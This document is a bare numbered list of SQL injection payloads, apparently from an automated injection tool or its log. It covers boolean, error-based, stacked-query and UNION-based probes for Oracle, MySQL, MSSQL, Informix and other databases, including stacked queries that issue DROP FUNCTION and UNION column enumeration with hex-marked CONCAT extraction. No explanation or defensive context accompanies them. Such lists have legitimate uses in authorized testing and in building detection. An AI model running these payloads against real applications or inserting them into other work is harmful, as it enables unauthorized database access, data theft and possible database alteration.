|296|') AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL-- adYO
|297|'' AND (SELECT (CASE WHEN (7552=7963) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,7552) END) FROM DUAL) IS NULL-- uHcY
|298|'' AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL-- vVQY
|299|') AND (SELECT (CASE WHEN (9875=6981) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,9875) END) FROM DUAL) IS NULL AND (4959=4959
|300|') AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND (9193=9193
|301|')) AND (SELECT (CASE WHEN (6739=9018) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,6739) END) FROM DUAL) IS NULL AND ((4370=4370
|302|')) AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND ((6270=6270
|303|'))) AND (SELECT (CASE WHEN (2740=5076) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,2740) END) FROM DUAL) IS NULL AND (((5239=5239
|304|'))) AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND (((8281=8281
|305|' AND (SELECT (CASE WHEN (7670=2064) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,7670) END) FROM DUAL) IS NULL
|306|' AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL
|307|'') AND (SELECT (CASE WHEN (1401=4342) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,1401) END) FROM DUAL) IS NULL AND ('HsQL'='HsQL
|308|'') AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND ('XnDZ'='XnDZ
|309|'')) AND (SELECT (CASE WHEN (8856=9386) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,8856) END) FROM DUAL) IS NULL AND (('ARPY'='ARPY
|310|'')) AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND (('uXQR'='uXQR
|311|''))) AND (SELECT (CASE WHEN (3164=6835) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3164) END) FROM DUAL) IS NULL AND ((('Jhbt'='Jhbt
|312|''))) AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND ((('IeYH'='IeYH
|313|'' AND (SELECT (CASE WHEN (8789=7849) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,8789) END) FROM DUAL) IS NULL AND 'PNpd'='PNpd
|314|'' AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND 'jJwo'='jJwo
|315|'') AND (SELECT (CASE WHEN (4778=2376) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4778) END) FROM DUAL) IS NULL AND ('rAqs' LIKE 'rAqs
|316|'') AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND ('NagS' LIKE 'NagS
|317|'')) AND (SELECT (CASE WHEN (3981=8906) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3981) END) FROM DUAL) IS NULL AND (('fmGa' LIKE 'fmGa
|318|'')) AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND (('wTEd' LIKE 'wTEd
|319|'%' AND (SELECT (CASE WHEN (9178=9846) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,9178) END) FROM DUAL) IS NULL AND 'AFmZ%'='AFmZ
|320|'%' AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND 'XqUu%'='XqUu
|321|'' AND (SELECT (CASE WHEN (2220=5946) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,2220) END) FROM DUAL) IS NULL AND 'GgSx' LIKE 'GgSx
|322|'' AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND 'AsRW' LIKE 'AsRW
|323|'&quot;) AND (SELECT (CASE WHEN (9633=9707) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,9633) END) FROM DUAL) IS NULL AND (&quot;kUKX&quot;=&quot;kUKX
|324|'&quot;) AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND (&quot;Lpfy&quot;=&quot;Lpfy
|325|'&quot;)) AND (SELECT (CASE WHEN (9824=1431) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,9824) END) FROM DUAL) IS NULL AND ((&quot;IHWI&quot;=&quot;IHWI
|326|'&quot;)) AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND ((&quot;tLNi&quot;=&quot;tLNi
|327|'&quot; AND (SELECT (CASE WHEN (5082=8582) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,5082) END) FROM DUAL) IS NULL AND &quot;vRDD&quot;=&quot;vRDD
|328|'&quot; AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND &quot;hlmv&quot;=&quot;hlmv
|329|'&quot;) AND (SELECT (CASE WHEN (6406=8912) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,6406) END) FROM DUAL) IS NULL AND (&quot;eKDy&quot; LIKE &quot;eKDy
|330|'&quot;) AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND (&quot;ovRg&quot; LIKE &quot;ovRg
|331|'&quot; AND (SELECT (CASE WHEN (8467=5169) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,8467) END) FROM DUAL) IS NULL AND &quot;nnUV&quot; LIKE &quot;nnUV
|332|'&quot; AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL AND &quot;qxcI&quot; LIKE &quot;qxcI
|333|' AND (SELECT (CASE WHEN (1554=6610) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,1554) END) FROM DUAL) IS NULL-- JjrZ
|334|' AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL-- wPdD
|335|' AND (SELECT (CASE WHEN (5907=5063) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,5907) END) FROM DUAL) IS NULL# DHtC
|336|' AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL# pNcf
|337|'' AND (SELECT (CASE WHEN (3199=6668) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3199) END) FROM DUAL) IS NULL OR 'NQvj'='Mzip
|338|'' AND (SELECT (CASE WHEN (4243=4243) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,4243) END) FROM DUAL) IS NULL OR 'fOhZ'='lXbU
|339|(SELECT (CASE WHEN (9873=2040) THEN ''''' ELSE (SELECT 2040 UNION SELECT 9521) END))
|340|(SELECT (CASE WHEN (1916=1916) THEN ''''' ELSE (SELECT 5776 UNION SELECT 8147) END))
|341|(SELECT (CASE WHEN (7053=6920) THEN 7053 ELSE 1/(SELECT 0) END))
|342|(SELECT (CASE WHEN (8975=8975) THEN 8975 ELSE 1/(SELECT 0) END))
|343|(SELECT (CASE WHEN (5350=9635) THEN 5350 ELSE 5350*(SELECT 5350 UNION ALL SELECT 9635) END))
|344|(SELECT (CASE WHEN (2268=2268) THEN 2268 ELSE 2268*(SELECT 2268 UNION ALL SELECT 4943) END))
|345|(SELECT (CASE WHEN (2500=8391) THEN 2500 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
|346|(SELECT (CASE WHEN (8408=8408) THEN 8408 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
|347|(SELECT (CASE WHEN (9191=7652) THEN 9191 ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)
|348|(SELECT (CASE WHEN (2957=2957) THEN 2957 ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)
|349|IIF(6669=6334,6669,1/0)
|350|IIF(7588=7588,7588,1/0)
|351|(CASE WHEN (8422=7021) THEN 8422 ELSE 8422*(SELECT 8422 FROM DUAL UNION SELECT 7021 FROM DUAL) END)
|352|(CASE WHEN (7203=7203) THEN 7203 ELSE 7203*(SELECT 7203 FROM DUAL UNION SELECT 9362 FROM DUAL) END)
|353|(CASE WHEN (3284=6158) THEN ''''' ELSE 3284*(SELECT 3284 FROM DUAL UNION SELECT 6158 FROM DUAL) END)
|354|(CASE WHEN (9781=9781) THEN ''''' ELSE 9781*(SELECT 9781 FROM DUAL UNION SELECT 9425 FROM DUAL) END)
|355|(CASE WHEN 3200=9937 THEN 3200 ELSE NULL END)
|356|(CASE WHEN 5258=5258 THEN 5258 ELSE NULL END)
|357|(CASE WHEN 5224=8179 THEN ''''' ELSE NULL END)
|358|(CASE WHEN 9898=9898 THEN ''''' ELSE NULL END)
|359|'',(SELECT (CASE WHEN (6247=8372) THEN 1 ELSE 6247*(SELECT 6247 FROM INFORMATION_SCHEMA.PLUGINS) END))-- nCjw
|360|'',(SELECT (CASE WHEN (5926=5926) THEN 1 ELSE 5926*(SELECT 5926 FROM INFORMATION_SCHEMA.PLUGINS) END))-- twbh
|361|',(SELECT (CASE WHEN (1589=5184) THEN 1 ELSE 1589*(SELECT 1589 FROM INFORMATION_SCHEMA.PLUGINS) END))
|362|',(SELECT (CASE WHEN (5926=5926) THEN 1 ELSE 5926*(SELECT 5926 FROM INFORMATION_SCHEMA.PLUGINS) END))
|363|'',(SELECT (CASE WHEN (5427=9983) THEN 0x27 ELSE 5427*(SELECT 5427 FROM INFORMATION_SCHEMA.PLUGINS) END))-- wdia
|364|'',(SELECT (CASE WHEN (2428=2428) THEN 0x27 ELSE 2428*(SELECT 2428 FROM INFORMATION_SCHEMA.PLUGINS) END))-- csIJ
|365|',(SELECT (CASE WHEN (1747=2731) THEN 0x27 ELSE 1747*(SELECT 1747 FROM INFORMATION_SCHEMA.PLUGINS) END))
|366|',(SELECT (CASE WHEN (2428=2428) THEN 0x27 ELSE 2428*(SELECT 2428 FROM INFORMATION_SCHEMA.PLUGINS) END))
|367|'',(SELECT (CASE WHEN (8699=8403) THEN 1 ELSE 1/(SELECT 0) END))-- Kzop
|368|'',(SELECT (CASE WHEN (2195=2195) THEN 1 ELSE 1/(SELECT 0) END))-- gwCs
|369|',(SELECT (CASE WHEN (5079=7117) THEN 1 ELSE 1/(SELECT 0) END))
|370|',(SELECT (CASE WHEN (2195=2195) THEN 1 ELSE 1/(SELECT 0) END))
|371|'',(SELECT (CASE WHEN (9870=5564) THEN 1 ELSE 9870*(SELECT 9870 UNION ALL SELECT 5564) END))-- BWgg
|372|'',(SELECT (CASE WHEN (1615=1615) THEN 1 ELSE 1615*(SELECT 1615 UNION ALL SELECT 5921) END))-- BAtw
|373|',(SELECT (CASE WHEN (1711=1095) THEN 1 ELSE 1711*(SELECT 1711 UNION ALL SELECT 1095) END))
|374|',(SELECT (CASE WHEN (1615=1615) THEN 1 ELSE 1615*(SELECT 1615 UNION ALL SELECT 5921) END))
|375|'',(SELECT (CASE WHEN (7678=1317) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)-- rEQy
|376|'',(SELECT (CASE WHEN (7207=7207) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)-- cuQq
|377|',(SELECT (CASE WHEN (2016=4713) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
|378|',(SELECT (CASE WHEN (7207=7207) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
|379|') HAVING 1063=6328-- Nqjc
|380|') HAVING 7186=7186-- scKY
|381|'' HAVING 5432=5085-- bgvL
|382|'' HAVING 7186=7186-- alwf
|383|') HAVING 4490=5113 AND (6251=6251
|384|') HAVING 7186=7186 AND (2480=2480
|385|')) HAVING 6939=2085 AND ((3400=3400
|386|')) HAVING 7186=7186 AND ((6091=6091
|387|'))) HAVING 2013=7381 AND (((2250=2250
|388|'))) HAVING 7186=7186 AND (((7008=7008
|389|' HAVING 4666=6635
|390|' HAVING 7186=7186
|391|'') HAVING 9376=2457 AND ('zJfR'='zJfR
|392|'') HAVING 7186=7186 AND ('AxnB'='AxnB
|393|'')) HAVING 4137=6808 AND (('TPkk'='TPkk
|394|'')) HAVING 7186=7186 AND (('gEfr'='gEfr
|395|''))) HAVING 1850=6490 AND ((('tAFt'='tAFt
|396|''))) HAVING 7186=7186 AND ((('BZwW'='BZwW
|397|'' HAVING 6766=9909 AND 'Htgi'='Htgi
|398|'' HAVING 7186=7186 AND 'Wzjr'='Wzjr
|399|'' HAVING 6094=2680 AND 'LYVA'='LYVA
|400|'') HAVING 1750=1348 AND ('kenA' LIKE 'kenA
|401|'') HAVING 7186=7186 AND ('vIyl' LIKE 'vIyl
|402|'')) HAVING 5158=5668 AND (('qdqd' LIKE 'qdqd
|403|'')) HAVING 7186=7186 AND (('KLNK' LIKE 'KLNK
|404|'%' HAVING 7856=9100 AND 'jIgG%'='jIgG
|405|'%' HAVING 7186=7186 AND 'UKuX%'='UKuX
|406|'%' HAVING 8809=3290 AND 'CxGs%'='CxGs
|407|'' HAVING 6198=6134 AND 'xnGY' LIKE 'xnGY
|408|'' HAVING 7186=7186 AND 'BUcg' LIKE 'BUcg
|409|'' HAVING 6302=3314 AND 'OUqM' LIKE 'OUqM
|410|'&quot;) HAVING 4841=5921 AND (&quot;fNeh&quot;=&quot;fNeh
|411|'&quot;) HAVING 7186=7186 AND (&quot;MaIk&quot;=&quot;MaIk
|412|'&quot;)) HAVING 7173=2551 AND ((&quot;tMHl&quot;=&quot;tMHl
|413|'&quot;)) HAVING 7186=7186 AND ((&quot;Cmud&quot;=&quot;Cmud
|414|'&quot; HAVING 6462=4777 AND &quot;qCyY&quot;=&quot;qCyY
|415|'&quot; HAVING 7186=7186 AND &quot;EAaU&quot;=&quot;EAaU
|416|'&quot;) HAVING 1629=4135 AND (&quot;dPds&quot; LIKE &quot;dPds
|417|'&quot;) HAVING 7186=7186 AND (&quot;ypTf&quot; LIKE &quot;ypTf
|418|'&quot; HAVING 2376=4906 AND &quot;hNdJ&quot; LIKE &quot;hNdJ
|419|'&quot; HAVING 7186=7186 AND &quot;SYVf&quot; LIKE &quot;SYVf
|420|' HAVING 7953=4053-- cpBm
|421|' HAVING 7186=7186-- vcQN
|422|' HAVING 8232=9105# kKbs
|423|' HAVING 7186=7186# ruOu
|424|'' HAVING 4666=1764 OR 'GXgu'='fBKy
|425|'' HAVING 7186=7186 OR 'LKzW'='guxK
|426|'' HAVING 7959=6076 OR 'pcGG'='kPIa
|427|');SELECT (CASE WHEN (6249=1380) THEN 6249 ELSE 1/(SELECT 0) END)--
|428|');SELECT (CASE WHEN (4449=4449) THEN 4449 ELSE 1/(SELECT 0) END)--
|429|'';SELECT (CASE WHEN (1258=8915) THEN 1258 ELSE 1/(SELECT 0) END)--
|430|'';SELECT (CASE WHEN (4449=4449) THEN 4449 ELSE 1/(SELECT 0) END)--
|431|'));SELECT (CASE WHEN (6307=4544) THEN 6307 ELSE 1/(SELECT 0) END)--
|432|'));SELECT (CASE WHEN (4449=4449) THEN 4449 ELSE 1/(SELECT 0) END)--
|433|')));SELECT (CASE WHEN (9155=5338) THEN 9155 ELSE 1/(SELECT 0) END)--
|434|')));SELECT (CASE WHEN (4449=4449) THEN 4449 ELSE 1/(SELECT 0) END)--
|435|';SELECT (CASE WHEN (9982=6720) THEN 9982 ELSE 1/(SELECT 0) END)--
|436|';SELECT (CASE WHEN (4449=4449) THEN 4449 ELSE 1/(SELECT 0) END)--
|437|'');SELECT (CASE WHEN (8312=1779) THEN 8312 ELSE 1/(SELECT 0) END)--
|438|'');SELECT (CASE WHEN (4449=4449) THEN 4449 ELSE 1/(SELECT 0) END)--
|439|''));SELECT (CASE WHEN (8698=5930) THEN 8698 ELSE 1/(SELECT 0) END)--
|440|''));SELECT (CASE WHEN (4449=4449) THEN 4449 ELSE 1/(SELECT 0) END)--
|441|'')));SELECT (CASE WHEN (4815=1608) THEN 4815 ELSE 1/(SELECT 0) END)--
|442|'')));SELECT (CASE WHEN (4449=4449) THEN 4449 ELSE 1/(SELECT 0) END)--
|443|'%';SELECT (CASE WHEN (2694=8435) THEN 2694 ELSE 1/(SELECT 0) END)--
|444|'%';SELECT (CASE WHEN (4449=4449) THEN 4449 ELSE 1/(SELECT 0) END)--
|445|'&quot;);SELECT (CASE WHEN (6069=3148) THEN 6069 ELSE 1/(SELECT 0) END)--
|446|'&quot;);SELECT (CASE WHEN (4449=4449) THEN 4449 ELSE 1/(SELECT 0) END)--
|447|'&quot;));SELECT (CASE WHEN (5469=7181) THEN 5469 ELSE 1/(SELECT 0) END)--
|448|'&quot;));SELECT (CASE WHEN (4449=4449) THEN 4449 ELSE 1/(SELECT 0) END)--
|449|'&quot;;SELECT (CASE WHEN (3362=7429) THEN 3362 ELSE 1/(SELECT 0) END)--
|450|'&quot;;SELECT (CASE WHEN (4449=4449) THEN 4449 ELSE 1/(SELECT 0) END)--
|451|');IF(9318=5097) SELECT 9318 ELSE DROP FUNCTION egdU--
|452|');IF(2152=2152) SELECT 2152 ELSE DROP FUNCTION oTcA--
|453|'';IF(2856=1303) SELECT 2856 ELSE DROP FUNCTION TXaj--
|454|'';IF(2152=2152) SELECT 2152 ELSE DROP FUNCTION oTcA--
|455|'));IF(7543=6499) SELECT 7543 ELSE DROP FUNCTION gGpN--
|456|'));IF(2152=2152) SELECT 2152 ELSE DROP FUNCTION oTcA--
|457|')));IF(6618=7306) SELECT 6618 ELSE DROP FUNCTION zfnI--
|458|')));IF(2152=2152) SELECT 2152 ELSE DROP FUNCTION oTcA--
|459|';IF(6386=6911) SELECT 6386 ELSE DROP FUNCTION HKDX--
|460|';IF(2152=2152) SELECT 2152 ELSE DROP FUNCTION oTcA--
|461|'');IF(1373=9985) SELECT 1373 ELSE DROP FUNCTION iUdL--
|462|'');IF(2152=2152) SELECT 2152 ELSE DROP FUNCTION oTcA--
|463|''));IF(8904=9025) SELECT 8904 ELSE DROP FUNCTION QQPJ--
|464|''));IF(2152=2152) SELECT 2152 ELSE DROP FUNCTION oTcA--
|465|'')));IF(5976=9752) SELECT 5976 ELSE DROP FUNCTION bOGi--
|466|'')));IF(2152=2152) SELECT 2152 ELSE DROP FUNCTION oTcA--
|467|'%';IF(9824=1377) SELECT 9824 ELSE DROP FUNCTION uJGa--
|468|'%';IF(2152=2152) SELECT 2152 ELSE DROP FUNCTION oTcA--
|469|'&quot;);IF(7473=6921) SELECT 7473 ELSE DROP FUNCTION xMbv--
|470|'&quot;);IF(2152=2152) SELECT 2152 ELSE DROP FUNCTION oTcA--
|471|'&quot;));IF(5570=4098) SELECT 5570 ELSE DROP FUNCTION kWLq--
|472|'&quot;));IF(2152=2152) SELECT 2152 ELSE DROP FUNCTION oTcA--
|473|'&quot;;IF(9050=8101) SELECT 9050 ELSE DROP FUNCTION qzqu--
|474|'&quot;;IF(2152=2152) SELECT 2152 ELSE DROP FUNCTION oTcA--
|475|') AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- yAeW
|476|'' AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XLJR
|477|') AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (8663=8663
|478|')) AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((5658=5658
|479|'))) AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (((8774=8774
|480|' AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
|481|'') AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('RuMf'='RuMf
|482|'')) AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (('DVHP'='DVHP
|483|''))) AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((('aOfx'='aOfx
|484|'' AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PHqw'='PHqw
|485|'') AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('ljIF' LIKE 'ljIF
|486|'')) AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (('OzaE' LIKE 'OzaE
|487|'%' AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JSFD%'='JSFD
|488|'' AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MyGK' LIKE 'MyGK
|489|'&quot;) AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (&quot;Ihpu&quot;=&quot;Ihpu
|490|'&quot;)) AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((&quot;XdmX&quot;=&quot;XdmX
|491|'&quot; AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND &quot;ektk&quot;=&quot;ektk
|492|'&quot;) AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (&quot;PgSX&quot; LIKE &quot;PgSX
|493|'&quot; AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND &quot;ZTsc&quot; LIKE &quot;ZTsc
|494|' AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- AABn
|495|' AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# WKzl
|496|'' AND (SELECT 1353 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(1353=1353,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR 'GMUj'='DoKi
|497|') AND EXTRACTVALUE(9385,CONCAT(0x5c,0x7171717671,(SELECT (ELT(9385=9385,1))),0x716b786271))-- ZyjX
|498|'' AND EXTRACTVALUE(9385,CONCAT(0x5c,0x7171717671,(SELECT (ELT(9385=9385,1))),0x716b786271))-- HbyK
|499|(SELECT CONCAT(CONCAT(0x7171717671,(CASE WHEN (1975=1975) THEN 0x31 ELSE 0x30 END)),0x716b786271))
|500|'' ORDER BY 1-- -
|501|'' UNION ALL SELECT NULL-- -
|502|'' UNION ALL SELECT NULL,NULL-- -
|503|'' UNION ALL SELECT NULL,NULL,NULL-- -
|504|'' UNION ALL SELECT NULL,NULL,NULL,NULL-- -
|505|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- -
|506|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
|507|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|508|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|509|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|510|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|511|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|512|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|513|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|514|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|515|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|516|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|517|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|518|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|519|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|520|'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|521|'' UNION ALL SELECT NULL,CONCAT(0x7171717671,0x4f4b5745554b674e556e59586e66506f664d547075526c644e5675764253687a64426d744e784e58,0x716b786271)-- -
|522|'' UNION ALL SELECT CONCAT(0x7171717671,0x6648435a6a526c6543755766636250476e795176767843646f527356776e5a4c6c62617664424759,0x716b786271),NULL-- -
|523|'' UNION ALL SELECT NULL,CONCAT(0x7171717671,0x437479414e74514b7850,0x716b786271)-- -
|524|'' UNION ALL SELECT CONCAT(0x7171717671,0x58437572424577414f47,0x716b786271),NULL-- -
|525|-9935' UNION ALL SELECT NULL,CONCAT(0x7171717671,0x6651626956436c7a594b6c5a4d6b464d756e435a724d76784f5161446d6a45684d4e646857644768,0x716b786271)-- -
